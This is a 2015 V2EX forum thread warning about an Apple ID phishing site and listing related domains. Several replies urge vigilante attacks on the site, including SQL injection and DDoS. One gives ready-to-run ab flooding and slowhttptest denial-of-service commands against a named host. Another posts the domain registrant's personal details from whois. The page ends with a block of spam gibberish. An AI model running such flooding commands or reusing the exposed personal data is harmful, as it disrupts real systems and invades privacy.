发现个骗取 Apple ID 密码的网站,大家留心! - V2EX
V2EX = way to explore
V2EX 是一个关于分享和探索的地方
现在注册
已注册用户请  登录
kchum
V2EX    分享发现

发现个骗取 Apple ID 密码的网站,大家留心!

  •  
  •   kchum 2015-02-04 21:52:27 +08:00 4293 次点击
    这是一个创建于 3905 天前的主题,其中的信息可能已经有所发展或是发生改变。
    切勿登录
    www.id-appleid-apple.com

    简单查了下 whois 信息,以下域名都应该是同一站点。
    find.appidlacksye.com
    activationicloudid.com
    appidlacksye.com
    28 条回复    2015-02-05 20:47:02 +08:00
    aheadlead
        1
    aheadlead  
       2015-02-04 22:12:38 +08:00
    有谁有兴趣去sqlmap一下吗..
    DT27
        2
    DT27  
       2015-02-04 22:41:34 +08:00
    已举报到360,其他平台要举报太麻烦了。。。
    xiaozhizhu1997
        3
    xiaozhizhu1997  
       2015-02-04 23:00:22 +08:00 via Android
    查IP看看能不能投诉到机房…
    aaronlam
        4
    aaronlam  
       2015-02-04 23:00:41 +08:00
    这域名也是醉了,看到页面后更醉!
    wdlth
        5
    wdlth  
       2015-02-04 23:02:04 +08:00
    我只能说非Verisign EV SSL请勿钓鱼
    nobita
        6
    nobita  
       2015-02-04 23:17:07 +08:00
    safari已经有了警告
    creamiced
        7
    creamiced  
       2015-02-04 23:40:05 +08:00
    那个确认按钮忘记修边了啊
    rainy3636
        8
    rainy3636  
       2015-02-05 00:35:09 +08:00
    chrome也已有警告
    rainy3636
        9
    rainy3636  
       2015-02-05 00:37:35 +08:00
    写了个假id假密码,提示错误后给我跳到了真icloud…
    quake0day
        10
    quake0day  
       2015-02-05 00:51:50 +08:00
    @rainy3636 你可以写一些骂人的话,或者不停的post垃圾上去,反正这些都会被记录到数据库,可以显著增加他们查对正确账号的时间成本。另外可以试试sql注入。
    lisonfan
        11
    lisonfan  
       2015-02-05 03:01:04 +08:00   2
    canky
        12
    canky  
       2015-02-05 03:20:16 +08:00 via iPhone
    我觉得开burp suite爆破模式提交一些垃圾不错
    futursolo
        13
    futursolo  
       2015-02-05 07:00:48 +08:00
    这破网站居然还有移动版。。。
    msg7086
        14
    msg7086  
       2015-02-05 07:19:42 +08:00   2
    echo '[email protected]&sjpass=test' > p
    ab -n 100000 -c 1000 -p p -T 'application/x-www-form-urlencoded' http://www.id-appleid-apple.com/Save.asp

    默默地按下回车
    lovelinghan
        15
    lovelinghan  
       2015-02-05 08:46:25 +08:00 via Android
    @msg7086 这个好
    m939594960
        16
    m939594960  
       2015-02-05 09:04:56 +08:00
    @msg7086 DELETE FROM user WHERE sjname='[email protected]'
    shippo7
        17
    shippo7  
       2015-02-05 09:05:18 +08:00 via iPhone
    写脚本疯狂提交垃圾数据
    dotpig
        18
    dotpig  
       2015-02-05 09:07:08 +08:00
    Chrome 大红色的钓鱼诱骗提醒,还是蛮喜庆的。
    DearTanker
        19
    DearTanker  
       2015-02-05 09:12:28 +08:00
    已经蹦了,你们好厉害啊。
    TangMonk
        20
    TangMonk  
       2015-02-05 09:12:36 +08:00
    @msg7086 酷炫,又学到一招

    但是为啥显示:
    Benchmarking www.id-appleid-apple.com (be patient)
    apr_socket_recv: Connection reset by peer (54)
    vvard3n
        21
    vvard3n  
       2015-02-05 09:22:03 +08:00
    来个py脚本吧?
    tmqhliu
        22
    tmqhliu  
       2015-02-05 09:26:07 +08:00
    这都是骗子用来给被盗的 Apple 手机钓鱼的,目的就是骗得机主的 Apple ID 和密码,以及密保信息。这种网站成本很低,做一个就转移了,很难打击。只能自己多多留心了
    carvizerw
        23
    carvizerw  
       2015-02-05 11:08:06 +08:00
    不知道这哥们是不是用真实信息注册的域名
    Registrant Name: he yaolong
    Registrant Organization: he yaolong
    Registrant Street: yexianbaoanzhenliwuzhuangwuzu
    Registrant City: pingdingshan
    Registrant State/Province: Henan
    Registrant Postal Code: 467200
    Registrant Country: CN
    Registrant Phone : +86.03756173999
    Registrant Phone Ext:
    Registrant Fax: +86.03756173999
    DT27
        24
    DT27  
       2015-02-05 11:17:28 +08:00
    哈哈,站长受不了了,域名都跳到百度了。。。
    msg7086
        25
    msg7086  
       2015-02-05 12:23:10 +08:00   1
    @m939594960 只是举个栗子罢了。请自行上伪真实数据。
    再给你们一个玩法。
    sudo aptitude install slowhttptest -y
    slowhttptest -c 5000 -t POST -u http://www.id-appleid-apple.com/Save.asp -l 3600

    OPENVZ慎用。请仅用于打击恶势力。
    laukwanchan
        26
    laukwanchan  
       2015-02-05 12:48:41 +08:00
    你们都把他们玩坏了好么
    dndx
        27
    dndx  
       2015-02-05 12:51:36 +08:00
    又发现了一个,欢迎大家 DDOS:

    http://www.apple-id-scr.com/
    nyanyh
        28
    nyanyh  
       2015-02-05 20:47:02 +08:00
    系提示:或被Syn攻,查!

    233333
    关于     帮助文档     自助推广系统     博客     API     FAQ     Solana     5787 人在线   最高记录 6679       Select Language
    创意工作者们的社区
    World is powered by solitude
    VERSION: 3.9.8.5 31ms UTC 01:42 PVG 09:42 LAX 18:42 JFK 21:42
    Do have faith in what you're doing.
    ubao snddm index pchome yahoo rakuten mypaper meadowduck bidyahoo youbao zxmzxm asda bnvcg cvbfg dfscv mmhjk xxddc yybgb zznbn ccubao uaitu acv GXCV ET GDG YH FG BCVB FJFH CBRE CBC GDG ET54 WRWR RWER WREW WRWER RWER SDG EW SF DSFSF fbbs ubao fhd dfg ewr dg df ewwr ewwr et ruyut utut dfg fgd gdfgt etg dfgt dfgd ert4 gd fgg wr 235 wer3 we vsdf sdf gdf ert xcv sdf rwer hfd dfg cvb rwf afb dfh jgh bmn lgh rty gfds cxv xcv xcs vdas fdf fgd cv sdf tert sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf shasha9178 shasha9178 shasha9178 shasha9178 shasha9178 liflif2 liflif2 liflif2 liflif2 liflif2 liblib3 liblib3 liblib3 liblib3 liblib3 zhazha444 zhazha444 zhazha444 zhazha444 zhazha444 dende5 dende denden denden2 denden21 fenfen9 fenf619 fen619 fenfe9 fe619 sdf sdf sdf sdf sdf zhazh90 zhazh0 zhaa50 zha90 zh590 zho zhoz zhozh zhozho zhozho2 lislis lls95 lili95 lils5 liss9 sdf0ty987 sdft876 sdft9876 sdf09876 sd0t9876 sdf0ty98 sdf0976 sdf0ty986 sdf0ty96 sdf0t76 sdf0876 df0ty98 sf0t876 sd0ty76 sdy76 sdf76 sdf0t76 sdf0ty9 sdf0ty98 sdf0ty987 sdf0ty98 sdf6676 sdf876 sd876 sd876 sdf6 sdf6 sdf9876 sdf0t sdf06 sdf0ty9776 sdf0ty9776 sdf0ty76 sdf8876 sdf0t sd6 sdf06 s688876 sd688 sdf86